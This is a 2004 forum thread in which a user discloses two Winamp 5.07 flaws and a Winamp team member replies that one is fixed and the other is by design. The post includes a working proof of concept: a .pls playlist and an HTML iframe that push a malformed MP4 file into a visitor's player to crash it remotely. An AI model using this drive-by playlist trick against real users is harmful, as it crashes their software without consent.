|
![]() |
|
Thread Tools | Search this Thread | Display Modes |
![]() |
#1 |
Junior Member
Join Date: Dec 2004
Posts: 4
|
Winamp 5.07 (latest version) Remote Crash + other stupid shizle
Winamp 5.07 (latest version) Remote Crash.
+ vuln to cause 100% cpu usage. 13/12/04 I. BACKGROUND Winamp is a very popular windows audio and video player. It also has alot of other features and is used by millions of people across the world. II. DESCRIPTION VULN 1. There is a vuln in winamp's handling of .mp4 and .m4a files. Which when exploited can remotly crash the victims winamp. The vuln lies in the .mp4 tagging system which winamp uses.If you use winamps built in feature to edit the tags on .mp4 or .m4a files and insert any data in there the next time the file is opened it will instantly crash winamp. now how to crash it remotly. if we create a .pls file contaning the data [playlist] numberofentries=5 File1=http://b0f.pwp.blueyonder.co.uk/a.mp4 Title1= Length5=-1 Version=2 and make a html page containing an iframe linking to the .pls like. <html> <iframe src="http://b0f.pwp.blueyonder.co.uk/exp2.pls"> now if the victim clicks a link to a page like http://b0f.pwp.blueyonder.co.uk/wexp3.htm it will auto open up the .pls file and load the .mp4 file into winamp and crash it. This could also be done with .m3u instead of .pls VULN 2. This one is simple if you create say a 1mb file probably smaller filled with junk and name it with either .nsv or .nsa file extension. When opened in winamp it will cause 100% cpu usage. The bigger the size of the file the more it will probably slow down the system. III. ANALYSIS Vuln 1. Successful exploitation allows remote attackers to crash the victims winamp. Vuln 2. Successful exploitation causes 100% cpu usage. IV. DETECTION This has been confirmed in the latest version of winamp 5.07 and probably vuln in earlier versions. V. WORKAROUND Don't open suspicous .mp4 .m4a .nsa or .nsv files or click untrusted links. VI. VENDOR The vendor has not been contacted. Why bother ? one asks VII. CREDIT Alan M aka b0f (b0fnet at yahoo.com) P.S Buy Tupac - Loyal to the Game out 14/12/04 ![]() |
![]() |
![]() |
![]() |
#2 |
Techorator
Winamp & Shoutcast Team Join Date: Jun 2000
Posts: 35,983
|
The in_mp4 issue is fixed for the next release. Thanks.
in_nsv behaves as you described by design.... Quote: "The nsv issue, while its annoying, it's the exact behavior we want. NSV is a bitstream and we search through a file looking for the NSV markers. If we don't find one, we cant play. This can cause high cpu load for a short amount of time." |
![]() |
![]() |
![]() |
|
Thread Tools | Search this Thread |
Display Modes | |
|
|